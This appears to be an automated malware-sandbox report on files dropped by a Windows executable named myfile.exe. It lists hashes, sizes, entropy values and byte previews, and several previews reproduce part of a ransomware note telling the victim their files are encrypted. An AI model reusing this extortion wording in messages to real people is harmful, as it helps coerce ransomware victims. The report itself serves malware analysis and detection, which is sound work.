                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):236
                                                              Entropy (8bit):7.077226947520238
                                                              Encrypted:false
                                                              SSDEEP:6:VHKMJELW55t6IXL1foH4tMj+fUX08Y6Jf4wIn:VHKniloH4tMj+8k8Y6R4wI
                                                              MD5:D2859B9A9116232A0EC822B625113278
                                                              SHA1:A451C4CD5F4D9942C2B4D58C237C6F08573B777B
                                                              SHA-256:8E7E16C27C6419F233712F5B33CCBEDAC14CFEE362D40B9C42E7BF7112DADC9B
                                                              SHA-512:F2D1606F413AD1CE4B12C2E1BEDFB5D000A657E294922ECA3985DAC9B5F9E9CFB15B62500A215708FD194FE0C75E92222F32445C3E42BDF612FE46362ED3DF19
                                                              Malicious:false
                                                              Preview:...I^...Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X...cQ(.o0.".2..}.T.09..J)D..F_.h...oR.%h..IF....`...
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 32, image size 5242880, cbSize 5242934, bits offset 54
                                                              Category:dropped
                                                              Size (bytes):5242934
                                                              Entropy (8bit):5.5808169353546635
                                                              Encrypted:false
                                                              SSDEEP:49152:aYM7tFNn/zA5J/z/JpDZ+nSeyAeVJ2oo7mzegWPRuP3N2ygDJeLxIoImA:i/MlmMiHRG5RA
                                                              MD5:6CA6AE2F1B66825C00909558BD4EABF8
                                                              SHA1:1C3505000B550BDA6F4831F7510BE668FBFC1EC4
                                                              SHA-256:9DC7E013CE26804AD4697D7FD1B29B38B0F3CB9039F58C0DA35D51A53D097810
                                                              SHA-512:1A5072FF2A44ADF1608E7CCAEFDB99AB94FC8C2D005B53D99D1184114F0EE34BF37DAAEABCD6B126EE55A5759264A8983DC33F8B5FA28868BA1DDAAE2142D1FD
                                                              Malicious:false
                                                              Preview:BM6.P.....6...(............. .......P.............................a...]...f...........0.......j...................!.......M...^...j...............J...!...5...............~...W...s...J.......t...........z.../...X......./...........u...........E...S...........\...K...~...<...........&.......`.......................v...].......y...............,.......)...<...O...........[.......~...S...............h...?.......H...{... ...............@...c...d...!...........8.......#...............9...&...~...............e...................,.......b.......X.......=...................0...........$...r.......!...9...........}.......|...B...S...#...............A...C...r...........c...........v...........................[...!...........L...........q...R...c...........m......._...f...........|...o..._...................g...>...................&...............C.......C...;...)...;.......B...........P...........8.......>...#...o.......l...^...d...r...w...,...............W...&.......}...I...7...<.......X...F.....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.82660346965237
                                                              Encrypted:false
                                                              SSDEEP:24:M7PjV2C4VDkPHIbNh5ByhhAoE0om+SkAmwzFhf6+nrMMj1TIV:MDjf4VDk/IJ8Gdm+GZFMo1Ta
                                                              MD5:0B6FDBC4A4B2CEF6A16F8CD600F8F2D1
                                                              SHA1:DE70DC492FD38B542EDF453CFABFBFCFF029AC0B
                                                              SHA-256:3F732361374A84B6EBD4EF4763C47C1CAA35AD4F930F4799F6975DE5FC35D630
                                                              SHA-512:6E929C5CE4C6B0293B5C182BC5B18FD9B35FE6B29DBDDFC0C659D295CC47AF6860BC76B940F056652F2D8FF46738E7934FE82AE99BBE286828E0F4DA0081098E
                                                              Malicious:false
                                                              Preview::......0R.q@....Z.L.SI..5-....c.-.......7n'.c.....'..wip..`.].ZC.;3#{..{.l.....B....-....B.F....E..E.R.$.......S\R.H.]`.1...4.fE..(tm..*w...0.*....E..6.-.X...|..X4j..3.>7:.R....H.....L....7.....".>m..Qb$..d..B......h......6....9.I.:.....Q..{..xm.....,..w.m..WO....Bj..).f>-.k1...1...c4h.pv.g.F...v.....HZ*G.^Gi..6.*........|..ll..~F..f...../*.T{d...'.*]{..SW......n..%...1...r..].?.!.....7..l.2.j.:..@..Z_+.....ctC.z/...u.."...&...<..Y3.dt...._..Y4,.l.JG.W.oW....A..).W..r.r.v.k...C.....`.|..eR.G...N.B........X..).@..y..?..X....T;y.....:`.. q.mS*....7.....PS...E1..=..$.....q.e."..S{|Q...xN..U..:m.)...J.)E..5..9.,;C.A7G%.b..~$.=.1..jr@D...........B~!...i...\E#*d.s.{;g..Z\.X.1.&3..H...f7>...bw.t/....g.q....T..........`qZ......\.f....J_b.....z.........*... M......v...P`C.&..w1....I3m..qv?.h.....q....iH...|...l.}..#.I...y.R...*...d......N.Y....A.|..%...5..3fD.ur...f`H^....O9.VGgv..n.. '..r..."...|.[%....#.8.9..{...N..7}.7.U`.....5.cj.a.l{zGD,.M
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.858996421853192
                                                              Encrypted:false
                                                              SSDEEP:24:rA2xr7TIkxrmLXfsHXxcVZvjUhbgPjb//qXDJR9blZmnrMMjZR:PTXQXfEXO/vibgPjb//MDJRNMMoZR
                                                              MD5:55D1D780A751920B8A17E8D95992496A
                                                              SHA1:B46AB07E34E2A915573D97D703C683A7E262A57E
                                                              SHA-256:BF3B6963985FD7F638EBA6464929357AC6BB808C9924FE83308F1FF5A0B7351F
                                                              SHA-512:20B0103859BCC8D532A2D0C6390EDD9DC061C63CE09DE51988F0D2F8E15E70DC6016D7CC1EB4ED60840F3C63DAE6CF08BED3B1369FF5616948DFF733C693A340
                                                              Malicious:false
                                                              Preview:.B...\.q=".51.....%...K.x+<.a_}X.z...:..8..Q...xX..(.4...N6...x0.k.....Q...2....0.m*....L.*..'...n1...d..}.$...$.jR?{..b.Q..<+..,...y..};.q......>..........\.%...qe\.m.M..b.<f..8..EA[...T.X.J`..1;.K.......z........cA.ekP..V*Qi.O.D.m$.~........:..'..~.z.'N..g=.C......"B.i.....Q.q.!.OF.. .0y..). ...qtpa.n.>.MP.....(........T|)<y#_d~........Q.;.5...&O......*~..V....].%xW.t..4.).9..-.(..-As.v...\..^Y......[.k.$0.9j..cdm.7X..:&+-....<A..2...uT..F4....F....._cwX..X.K.qw.`..3...}_...../..o.......(V.....C;..N..Uu..9...:f......X...""(......L.N.C.8(..f.........?..l.P..;<...../2.....!].N....>...0@......7....*......k0.......Y..<.. R.$..{-..1.a........W:...'Lu......=.....@\....\^.yv..nW.E..........C_.njO...q..;+^e*J}H?8.a. }..Q..Z.!..>rz\..Y..h..]..i..9.G.._.t...1..Bf..x.];......+L...y.C......m...4v..CbD..D.L.CZD..I IF..P@.i.p>.4...,..=e..W.FA!.F..Y..8.D..L.]^.,`.tG.$.V....{.vLn.j.T.m.r9..On..u.~{........n8[.mU6..6...@.1.......KdJ...4t;....nG;.\...Hr.a....`z
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.852961007484867
                                                              Encrypted:false
                                                              SSDEEP:24:Nz4ki/JLp2lrSsFNW5iCKRUQrJnPhaN2q4hnrMMjPhz:Nz8RLSF2iCKOW5aND45MoPx
                                                              MD5:7759DE095F18952A03D9243087B0A2D6
                                                              SHA1:0B3BCD0D33BB50FAEDA54880FFCF46E6C409B080
                                                              SHA-256:3A12A9120AD0A770A4C4017EB24DECDD06BBBF9B41EA74C643E2C72D35B59043
                                                              SHA-512:CA673D0984501D84555A7ECA356FDC50BBFAE7D6FB6E809DFF5ED7A61A51A2E9765DCEDA4504F4F1E77D72A630D06E704A5EDB670BF4422BFB8E630A74DD9935
                                                              Malicious:true
                                                              Preview:...%.{w{dT|e..Q\...1@........RS.....B.\SJ....c..M..%y...e..k.V.[XTO,/N............f.%..ml.f..,C.....}e\......D)e.....^.^/.....h..v..E......M..F..T7z./y.......t..g]CXu.|.L.O.Ew+*.yr.....+...5).|'.Z.0.....,9%..i:].^T$-a.C..b....,...u.Q.i.9Y..N.$.J.\X...H.]..2.39v`..T...G..c}V....<.6......wH...;.U...w....Q...J}G......j....@6'..>/.R_2M..n.V..e..8.N.+.......}.}a0...<.y.....:#..(..5..A1..^5i..n.q..=.l....R.l:O........e_T........~D..B...I/..V..,.A.J.`...z!g.Kc..a..X0]*..j....|.2**f..<...'..I..<..J... .3.K.\sf%^.Q.i..v..c.._]...Z.IQ.oZ..=^..BS...\..SL>$..e4...A.>g.9.R..=..P.9./n.>..0.x...c.Mei]..X.5...........S.O*E...4.ys^3.w.].].I.^B.>....q.|.EIG...8'....LQD....... .....kt....J.vS:^..kLX...?%.5..j..D........Q'|.......oB,.U.S....W....dSr.....N.o.\?vh..l.!.4.^.=.Wa...= VO.R..Z.....K.W...Q......?.k...d.D*np....;.%..Y.J.6....P.R^C..02>..v.e..0..L.wO*......B.y>R..c_.*.gF..>.h.x._..f-.U.9.*..^..v9..r...w@....a5.JO...a.j~YS].K..$_......
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.852215987983184
                                                              Encrypted:false
                                                              SSDEEP:24:bbUy1FkYrhzyJk2004eD/rgULiJey5dXMUjhnvOv9BnrMMjSUr:nUijdWk2lDcVoy5xMK8vnMoSUr
                                                              MD5:7710F8B61308B0C01E432DA9C4974A51
                                                              SHA1:ACCA1F39D18BC89745663F835975148E4DF54421
                                                              SHA-256:95CCDF2F42D677D87779064A8ABAAEF11733F8DEA08D7CAF8F9A69CB3D738A00
                                                              SHA-512:5212C722A1868749719D9601A64AD03FF50C90CB652786408F57AB572F4DF35734504AC4FAF9011295EECAD375E633C9EB1FB6253EAF893AF1820A8AF4E450C2
                                                              Malicious:false
                                                              Preview:oE.z....$...[.s^..I....A..Y)q...'.BJ-..5.9z7.b.....eN.5...$f.......`cB..[T%.#......(..t!L...Ot.DWg.......?.@....|.k.Ht.3.D'~'..t...9.Y....b&...........&.+V%....+.J.:.Ct..N..t,.jk.....z$...6......N..BJ.,.[..:.^...*-....L..A.Vb.*.8~......!..a,.q_B...............G....Z.'..h...y.[.W.}Z:.".9?9.\.s.?x.....L..r..[..=.,....@i.`....0.. .................0.Z..9..oL..+....c..AS.`X.E...............w-..j.....n.{P/..5.S..n..v.t.p).*..._.z...j...o#..Z R..~.qF.tY.o0A.e$!..s`.s{=....d....%L.}.L.K/....N/..NV..!_.Y8.5......,..+.I'.o......U...(.m.!.@WG.pHU..;^.Gg..$2]...g.`..f..FK...4...Tl^.....N.V..%.-C@..H.0...4..S....z-:.(.8........aK.l.F.=.U....Hv...g.H..:.a....Z.d.*..-.....rC...._[."#p'...*..{.....{..^"....d.C.~.._8(..pA3.<fu|EVj5...u.....k.:P]..mu..Ja.5P.)..{....4...u...P..#...$y....."f..r.....5....`.o...$.GGT+.@.W...-.<'....:%..........O...";.~zx.h..^k.....]p.[t)H.%..._.^..5.2.7....h:A.... :.Y.v.c..0..o.$.;..[..F..q$.<.].a_.?......-..dJ^..I.....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1254
                                                              Entropy (8bit):7.8431063992642285
                                                              Encrypted:false
                                                              SSDEEP:24:zws1sbSvD/M81QAkM0PoYdFwcQKy7xhAYNjZjD+/JJGutwNnrMMjg:Us1668PoYzV2fZjD+hJVwdMog
                                                              MD5:35058D294A596098DD34365065063E0C
                                                              SHA1:4C7DF4803C998A3E2ADFF4E9F94F02B736E9636C
                                                              SHA-256:0FBECBB7F1883704FD958B7A403AC12EB850BA8E042E2678A2F6E28A64312510
                                                              SHA-512:F20E24271C621FBD208AC44D282056603500A3E107189AAE104C9DAE83C87C97C07A946F23865A09CCC3D8C99E16184B6CFA3C294705646A442413D162BF996D
                                                              Malicious:false
